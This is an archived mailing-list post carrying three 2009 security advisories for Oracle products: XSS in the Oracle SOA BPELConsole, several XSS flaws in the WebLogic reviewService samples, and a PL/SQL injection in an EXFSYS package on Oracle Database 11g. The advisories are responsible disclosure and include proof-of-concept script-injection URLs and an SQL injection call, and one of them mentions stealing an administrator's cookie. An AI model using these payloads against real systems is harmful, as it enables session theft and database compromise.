<<< Date Index >>>     <<< Thread Index >>>

Oracle CPU Jan 2009 Advisories.



Advisories for Oracle CPU January 2009 vulnerabilities Attached.





Polyakov Alexandr
Information Security Analyst
______________________
DIGITAL SECURITY
phone:  +7 812 703 1547
        +7 812 430 9130
e-mail: a.polyakov@xxxxxxx  
www.dsec.ru


-----------------------------------
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
-----------------------------------      
Digital Security Research Group [DSecRG] Advisory    #DSECRG-09-001



Application:                    Oracle Application Server (SOA)
Versions Affected:              Oracle Application Server (SOA) version 
10.1.3.1.0  
Vendor URL:                     http://www.oracle.com
Bugs:                           XSS
Exploits:                       YES
Reported:                       10.01.2008
Vendor response:                11.01.2008
Date of Public Advisory:        13.01.2009
CVE:                            CVE-2008-4014
Description:                    XSS IN BPELCONSOLE/DEFAULT/ACTIVITIES.JSP 
Author:                         Alexandr Polyakov
                                Digital Security Reasearch Group [DSecRG] 
(research [at] dsec [dot] ru)


Description
***********

Linked XSS vulnerability found in  BPEL module of Oracle Application Server 
(Oracle SOA Suite).  



Details
*******


Linked XSS vulnerability found in  BPEL module. In page 
BPELConsole/default/activities.jsp   attacker can inject XSS by appending it to 
URL




Example
*******


http://[localhost]:8888/BPELConsole/default/activities.jsp?'><script>alert('DSEC_XSS')</script>=DSecRG



Attacker must send injected link to administrator and get adminiatrators cookie.


Code with injected XSS:

----------------------------------------------------------------

 </th>
                    <th id="activityLabel" class="ListHeader" align="left" 
nowrap>
                    <a 
href='activities.jsp?'><script>alert('DSecRG_XSS')</script>=DSecRG&orderBy=label'
 class=HeaderLink>
                        Activity Label
                    </a>
                    </th>

---------------------------------------------------------------------------


Fix Information
***************

Information was published in CPU January 2009.
All customers can download CPU petches following instructions from: 

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
 



Credits
*******
Oracle give a credits for Alexander Polyakov from Digital Security Company in 
CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
 




About
*****

Digital Security is leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:        research [at] dsec [dot] ru
                http://www.dsecrg.ru 
                http://www.dsec.ru






Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-002


Application:                    Oracle BEA Weblogic 10 
Versions Affected:              Oracle BEA Weblogic 10  
Vendor URL:                     http://oracle.com
Bugs:                           Multiple XSS Vulnerabilities in samples
Exploits:                       YES
Reported:                       16.07.2008
Vendor response:                18.07.2008 
Last response:                  30.10.2008
Description:                    reviewService sample of WebLogic Server.        
Date of Public Advisory:        13.01.2009  
Authors:                        Alexandr Polyakov
                                Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)


Description
***********


Multiple XSS Vulnerabilities found in Oracle BEA Weblogic Server samples 
version 10.2 and latest.



Details
*******

Vulnerabilities found in reviewService sample of Weblogic Server.

1. Linked XSS found in createArtist_service.jsp page. Vulnerable parameter 
"name"


Example
*******
http://testserver.com:7001/reviewService/createArtist_service.jsp?name=<script>alert('DSECRG')</script>


2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "title"


Example
*******
http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111&title=<script>alert('DSECRG')</script>


3. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example
*******
http://testserver.com:7001/reviewService/addReview_service.jsp?comment=111&rating=<script>alert('DSECRG')</script>

4. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example
*******
http://testserver.com:7001/reviewService/addReview_session.jsp?comment=111&rating=<script>alert('DSECRG')</script>

5. Also there are a couple of XSS vulnerabilities in POST parameters in scripts:


http://testserver.com:7001/reviewService/examplesWebApp/JWS_WebService.jsp
http://testserver.com:7001/reviewService/ClientServlet
http://testserver.com:7001/reviewService/InterceptorClientServlet
http://testserver.com:7001/reviewService/createArtist_service.jsp
http://testserver.com:7001/reviewService/createArtist_session.jsp

Fix Information
***************

This is Security-In-Depth vulnerability, because was found in 
samples.(http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm) 
Vulnerability issues that result in significant modification of Oracle code or 
documentation in future releases,
but are not of such a critical nature that they are distributed in Critical 
Patch Updates.


http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
 


Credits
*******
Oracle give a credits for Alexander Polyakov from Digital Security Company in 
Security-In-Depth program of CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
 


About
*****

Digital Security is leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:        research [at] dsec [dot] ru
                http://www.dsecrg.ru 
                http://www.dsec.ru






Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-003


Application:                    Oracle database 11G 
Versions Affected:              Oracle 11.1.0.6 and 10.2.0.1  
Vendor URL:                     http://oracle.com
Bugs:                           PL/SQL Injections
Exploits:                       YES
Reported:                       17.11.2008
Vendor response:                18.11.2008
Last response:                  24.11.2008                              
Date of Public Advisory:        13.01.2009 
Authors:                        Alexandr Polyakov
                                Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)


Description
***********

Oracle Database 11G vulnerable to PL/SQL Injection.

Vulnerability found in Extended filter system (EXFSYS).



Details
*******

PL/SQL Injection found in procedure EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS 
(maybe other functions in this package)
Procedure EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS executes with rights of user  
EXFSYS.

If Attacker have access  to EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS. he can do 
all things with EXFSYS user rights;
By default user EXFSYS have privelege  "CREATE LIBRARY"  and "CREATE ANY 
TRIGGER". So he teoretically can get access to OS.


it can only be exploited by an attacker who is either running as a privileged 
users, e.g. as EXFSYS
or SYS, or on a system where access to the EXFSYS routines has been granted to 
unprivileged users so this a
defense in depth issue.


EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS  has 4 parameters 

TAB_OWNER
TAB_NAME
EXP_COLUMN
ASET_NM

"ASET_NM" is vulnerable to SQL Injection




Example:
*******

exec EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS('EXFSYS','EXF$VERSION','EXFVER
SION','YYYYYYY'' and 1=EVILPROC()--')



Vulnerable Request in v$sql log file
***********************************


SELECT attribute, data_type from  ADM_EXPFIL_ATTRIBUTES where owner = 'EXFSYS' 
and 
attribute_set_name = 'YYYYYYY' and EVILPROC()=EVILPROC()--' and table_alias =  
'NO'  and (data_type like 'VARCHAR(%)' or data_type like 'VARCHAR2(%)'  
or data_type = 'INT' or data_type = 'INTEGER' or  data_type = 'NUMBER' or 
data_type = 'DATE')


Fix Information
***************

This is Security-In-Depth 
vulnerability.(http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm)
Vulnerability issues that result in significant modification of Oracle code or 
documentation in future releases,
but are not of such a critical nature that they are distributed in Critical 
Patch Updates.


http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
 



Credits
*******

Oracle give a credits for Alexander Polyakov from Digital Security Company in 
Security-In-Depth program of CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
 




About
*****

Digital Security is leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:        research [at] dsec [dot] ru
                http://www.dsecrg.ru 
                http://www.dsec.ru